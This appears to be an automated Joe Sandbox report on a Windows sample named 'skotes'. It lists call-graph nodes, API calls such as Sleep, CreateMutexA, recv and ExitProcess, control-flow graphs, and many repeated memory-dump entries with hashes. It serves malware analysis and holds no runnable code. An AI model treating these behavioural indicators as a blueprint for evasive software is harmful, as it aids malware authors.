3 API calls 9982->9984 9982->9987 9988 fe7f8b 9982->9988 9985 fe8390 3 API calls 9983->9985 9983->9988 9984->9987 9985->9987 9986 fe86ea 3 API calls 9986->9988 9987->9986 9987->9988 9988->9955 9991 fe7b62 __dosmaperr 9989->9991 9993 fe8ab6 9991->9993 9992 fe7b85 __dosmaperr 9992->9964 9994 fe8ad1 9993->9994 9997 fe8868 9994->9997 9996 fe8adb 9996->9992 9998 fe887a 9997->9998 9999 fe690a __cftof GetPEB ExitProcess GetPEB 9998->9999 10002 fe888f __dosmaperr ___std_exception_copy 9998->10002 10001 fe88bf 9999->10001 10000 fe6d52 GetPEB ExitProcess GetPEB 10000->10001 10001->10000 10001->10002 10002->9996 10004 fe83ab 10003->10004 10005 fe83dd 10004->10005 10015 fec88e 10004->10015 10005->9978 10008 fe825a 10007->10008 10022 fed3c8 10008->10022 10010 fe830d 10010->9978 10010->10010 10012 fe875d __floor_pentium4 10011->10012 10014 fe8707 10011->10014 10012->9976 10013 fec88e __cftof 3 API calls 10013->10014 10014->10012 10014->10013 10018 fec733 10015->10018 10017 fec8a6 10017->10005 10019 fec743 10018->10019 10020 fe690a __cftof GetPEB ExitProcess GetPEB 10019->10020 10021 fec748 __cftof __dosmaperr ___std_exception_copy 10019->10021 10020->10021 10021->10017 10023 fed3d8 __dosmaperr ___std_exception_copy 10022->10023 10024 fed3ee 10022->10024 10023->10010 10024->10023 10025 fed485 10024->10025 10026 fed48a 10024->10026 10028 fed4ae 10025->10028 10029 fed4e4 10025->10029 10035 fecbdf 10026->10035 10031 fed4cc 10028->10031 10032 fed4b3 10028->10032 10052 fecef8 10029->10052 10048 fed0e2 10031->10048 10041 fed23e 10032->10041 10036 fecbf1 10035->10036 10037 fe690a __cftof GetPEB ExitProcess GetPEB 10036->10037 10038 fecc05 10037->10038 10039 fecc0d __alldvrm __cftof __dosmaperr ___std_exception_copy _strrchr 10038->10039 10040 fecef8 GetPEB ExitProcess GetPEB 10038->10040 10039->10023 10040->10039 10042 fed26c 10041->10042 10043 fed2de 10042->10043 10045 fed2b7 10042->10045 10046 fed2a5 10042->10046 10044 fecf9a GetPEB ExitProcess GetPEB 10043->10044 10044->10046 10047 fed16d GetPEB ExitProcess GetPEB 10045->10047 10046->10023 10047->10046 10049 fed10f 10048->10049 10050 fed14e 10049->10050 10051 fed16d GetPEB ExitProcess GetPEB 10049->10051 10050->10023 10051->10050 10053 fecf10 10052->10053 10054 fecf75 10053->10054 10055 fecf9a GetPEB ExitProcess GetPEB 10053->10055 10054->10023 10055->10054 10446 fb2b90 10447 fb2bce 10446->10447 10448 fcb7fb TpReleaseWork 10447->10448 10449 fb2bdb shared_ptr __floor_pentium4 10448->10449 10526 fb2b10 10527 fb2b1a 10526->10527 10528 fb2b1c 10526->10528 10529 fcc26a 4 API calls 10528->10529 10530 fb2b22 10529->10530 9746 fba856 9748 fba870 9746->9748 9749 fba892 shared_ptr 9746->9749 9747 fba953 Sleep CreateMutexA 9750 fba98e 9747->9750 9748->9747 9748->9749 10531 fcd111 10532 fcd122 10531->10532 10533 fcd12a 10532->10533 10535 fcd199 10532->10535 10536 fcd1a7 SleepConditionVariableCS 10535->10536 10538 fcd1c0 10535->10538 10536->10538 10538->10532 10236 fb3c8e 10237 fb3c98 10236->10237 10239 fb3ca5 10237->10239 10244 fb2410 10237->10244 10240 fb3810 3 API calls 10239->10240 10241 fb3ccf 10240->10241 10242 fb3810 3 API calls 10241->10242 10243 fb3cdb shared_ptr 10242->10243 10245 fb2424 10244->10245 10248 fcb52d 10245->10248 10256 fe3aed 10248->10256 10250 fb242a 10250->10239 10251 fcb5a5 ___std_exception_copy 10263 fcb1ad 10251->10263 10252 fcb598 10259 fcaf56 10252->10259 10267 fe4f29 10256->10267 10258 fcb555 10258->10250 10258->10251 10258->10252 10260 fcaf9f ___std_exception_copy 10259->10260 10262 fcafb2 shared_ptr 10260->10262 10273 fcb39f 10260->10273 10262->10250 10264 fcb1d8 10263->10264 10266 fcb1e1 shared_ptr 10263->10266 10265 fcb39f 4 API calls 10264->10265 10265->10266 10266->10250 10268 fe4f2e __cftof 10267->10268 10268->10258 10269 fed634 __cftof 3 API calls 10268->10269 10272 fe8bfc __cftof 10268->10272 10269->10272 10270 fe65ed __cftof 3 API calls 10271 fe8c2f 10270->10271 10272->10270 10274 fcbedf InitOnceExecuteOnce 10273->10274 10275 fcb3e1 10274->10275 10276 fcb3e8 10275->10276 10284 fe6cbb 10275->10284 10276->10262 10285 fe6cc7 __dosmaperr 10284->10285 10286 fea671 __cftof 3 API calls 10285->10286 10289 fe6ccc 10286->10289 10287 fe8bec __cftof 3 API calls 10288 fe6cf6 10287->10288 10289->10287 10323 fe6a44 10324 fe6a5c 10323->10324 10325 fe6a52 10323->10325 10328 fe698d 10324->10328 10327 fe6a76 ___free_lconv_mon 10329 fe690a __cftof 3 API calls 10328->10329 10330 fe699f 10329->10330 10330->10327 10059 fb2ec0 10060 fb2f06 10059->10060 10064 fb2f6f 10059->10064 10093 fcc6ac 10060->10093 10063 fb2fef 10064->10063 10070 fcc6ac GetSystemTimePreciseAsFileTime 10064->10070 10065 fb301e 10096 fcc26a 10065->10096 10067 fb3024 10068 fcc26a 4 API calls 10067->10068 10071 fb2fb9 10068->10071 10069 fb2f1d __Mtx_unlock 10069->10064 10069->10067 10070->10071 10072 fcc26a 4 API calls 10071->10072 10073 fb2fc0 __Mtx_unlock 10071->10073 10072->10073 10074 fcc26a 4 API calls 10073->10074 10075 fb2fd8 __Cnd_broadcast 10073->10075 10074->10075 10075->10063 10076 fcc26a 4 API calls 10075->10076 10077 fb303c 10076->10077 10078 fcc6ac GetSystemTimePreciseAsFileTime 10077->10078 10079 fb3080 shared_ptr __Mtx_unlock 10078->10079 10080 fb31c5 10079->10080 10082 fb31cb 10079->10082 10086 fb31a7 __floor_pentium4 10079->10086 10089 fcc6ac GetSystemTimePreciseAsFileTime 10079->10089 10081 fcc26a 4 API calls 10080->10081 10081->10082 10083 fcc26a 4 API calls 10082->10083 10084 fb31d1 10083->10084 10085 fcc26a 4 API calls 10084->10085 10090 fb3193 __Mtx_unlock 10085->10090 10087 fcc26a 4 API calls 10088 fb31dd 10087->10088 10091 fb315f 10089->10091 10090->10086 10090->10087 10091->10080 10091->10084 10091->10090 10100 fcbd4c 10091->10100 10103 fcc452 10093->10103 10095 fb2f12 10095->10065 10095->10069 10097 fcc292 10096->10097 10099 fcc274 10096->10099 10097->10097 10099->10097 10120 fcc297 10099->10120 10137 fcbb72 10100->10137 10102 fcbd5c 10102->10091 10104 fcc4a8 10103->10104 10106 fcc47a __floor_pentium4 10103->10106 10104->10106 10109 fccf6b 10104->10109 10106->10095 10107 fcc4fd __Xtime_diff_to_millis2 10107->10106 10108 fccf6b _xtime_get GetSystemTimePreciseAsFileTime 10107->10108 10108->10107 10110 fccf7a 10109->10110 10112 fccf87 __aulldvrm 10109->10112 10110->10112 10113 fccf44 10110->10113 10112->10107 10116 fccbea 10113->10116 10117 fccbfb GetSystemTimePreciseAsFileTime 10116->10117 10118 fccc07 10116->10118 10117->10118 10118->10112 10123 fb2ae0 10120->10123 10122 fcc2ae std::_Throw_future_error 10130 fcbedf 10123->10130 10125 fb2af4 __dosmaperr 10125->10122 10126 fea671 __cftof 3 API calls 10125->10126 10129 fe6ccc 10126->10129 10127 fe8bec __cftof 3 API calls 10128 fe6cf6 10127->10128 10129->10127 10133 fccc31 10130->10133 10134 fccc3f InitOnceExecuteOnce 10133->10134 10136 fcbef2 10133->10136 10134->10136 10136->10125 10138 fcbb9c 10137->10138 10139 fccf6b _xtime_get GetSystemTimePreciseAsFileTime 10138->10139 10140 fcbba4 __Xtime_diff_to_millis2 __floor_pentium4 10138->10140 10141 fcbbcf __Xtime_diff_to_millis2 10139->10141 10140->10102 10141->10140 10142 fccf6b _xtime_get GetSystemTimePreciseAsFileTime 10141->10142 10142->10140 10143 fcd0c7 10144 fcd0d7 10143->10144 10145 fcd17f 10144->10145 10146 fcd17b RtlWakeAllConditionVariable 10144->10146 10147 fbe0c0 recv 10148 fbe122 recv 10147->10148 10149 fbe157 recv 10148->10149 10151 fbe191 10149->10151 10150 fbe2b3 __floor_pentium4 10151->10150 10152 fcc6ac GetSystemTimePreciseAsFileTime 10151->10152 10153 fbe2ee 10152->10153 10154 fcc26a 4 API calls 10153->10154 10155 fbe358 10154->10155 10343 fb2e00 10344 fb2e28 10343->10344 10345 fcc68b __Mtx_init_in_situ 2 API calls 10344->10345 10346 fb2e33 10345->10346 10450 fb8980 10452 fb89d8 shared_ptr 10450->10452 10453 fb8aea 10450->10453 10451 fb5c10 3 API calls 10451->10452 10452->10451 10452->10453 10331 fb3c47 10332 fb3c51 10331->10332 10334 fb32d0 5 API calls 10332->10334 10335 fb3c5f 10332->10335 10333 fb3c68 10334->10335 10335->10333 10336 fb3810 3 API calls 10335->10336 10337 fb3cdb shared_ptr 10336->10337 10498 fb9f44 10500 fb9f4c shared_ptr 10498->10500 10499 fba953 Sleep CreateMutexA 10501 fba98e 10499->10501 10500->10499 10502 fba01f shared_ptr 10500->10502

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 351 fe652b-fe6538 call fea302 354 fe655a-fe656c call fe656d ExitProcess 351->354 355 fe653a-fe6548 GetPEB 351->355 355->354 357 fe654a-fe6559 355->357 357->354
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32(?,?,00FE652A,?,?,?,?,?,00FE7661), ref: 00FE6567
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a04852afeffc82e3a8b9c751d0397243969a8290a3bfdcd3cc2c0cfba229f737
                                                                                                                                                                                                                                                                                          • Instruction ID: f6142217dc751995a96501303c604dcfee194a48c0a8cd351b4315e1e7e941e5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a04852afeffc82e3a8b9c751d0397243969a8290a3bfdcd3cc2c0cfba229f737
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CE0863021028C6FCE35BB19CC5D94C3B19EB517A5F140804FD1486121CB29DD41DA90

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391674296.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391695977.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391716314.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391735889.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391755164.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391779653.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391800236.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391853854.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391875035.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391900756.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391921750.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391941571.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391961642.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391980983.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 3974c12e577e03c2db10f9e3c840f43b428f0b432d6a9dca2fb231ee3ae21800
                                                                                                                                                                                                                                                                                          • Instruction ID: c8ecf8bd66ffc36f039a11c29560257d22f28808536de193e6519dc1abaa78d9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3974c12e577e03c2db10f9e3c840f43b428f0b432d6a9dca2fb231ee3ae21800
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4312C71B041019BEB189B79DDC9BEDBB62EBC1320F24821CE1149B2D5C7B94981EF51

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 22 fb9f44-fb9f64 26 fb9f92-fb9fae 22->26 27 fb9f66-fb9f72 22->27 30 fb9fdc-fb9ffb 26->30 31 fb9fb0-fb9fbc 26->31 28 fb9f88-fb9f8f call fcd663 27->28 29 fb9f74-fb9f82 27->29 28->26 29->28 32 fba92b 29->32 36 fba029-fba916 call fc80c0 30->36 37 fb9ffd-fba009 30->37 34 fb9fbe-fb9fcc 31->34 35 fb9fd2-fb9fd9 call fcd663 31->35 39 fba953-fba994 Sleep CreateMutexA 32->39 40 fba92b call fe6c6a 32->40 34->32 34->35 35->30 43 fba00b-fba019 37->43 44 fba01f-fba026 call fcd663 37->44 51 fba9a7-fba9a8 39->51 52 fba996-fba998 39->52 40->39 43->32 43->44 44->36 52->51 54 fba99a-fba9a5 52->54 54->51
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064), ref: 00FBA963
                                                                                                                                                                                                                                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1390808577.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390780269.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390808577.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390901310.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390925797.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390951187.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1390983955.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391005427.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391172402.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391199282.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391292363.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391319218.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391344720.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391367124.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391394401.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391413567.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391437813.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391458864.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391486372.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391506310.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391526256.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391549522.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391567777.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391590106.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391610638.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391630415.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1391650653.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
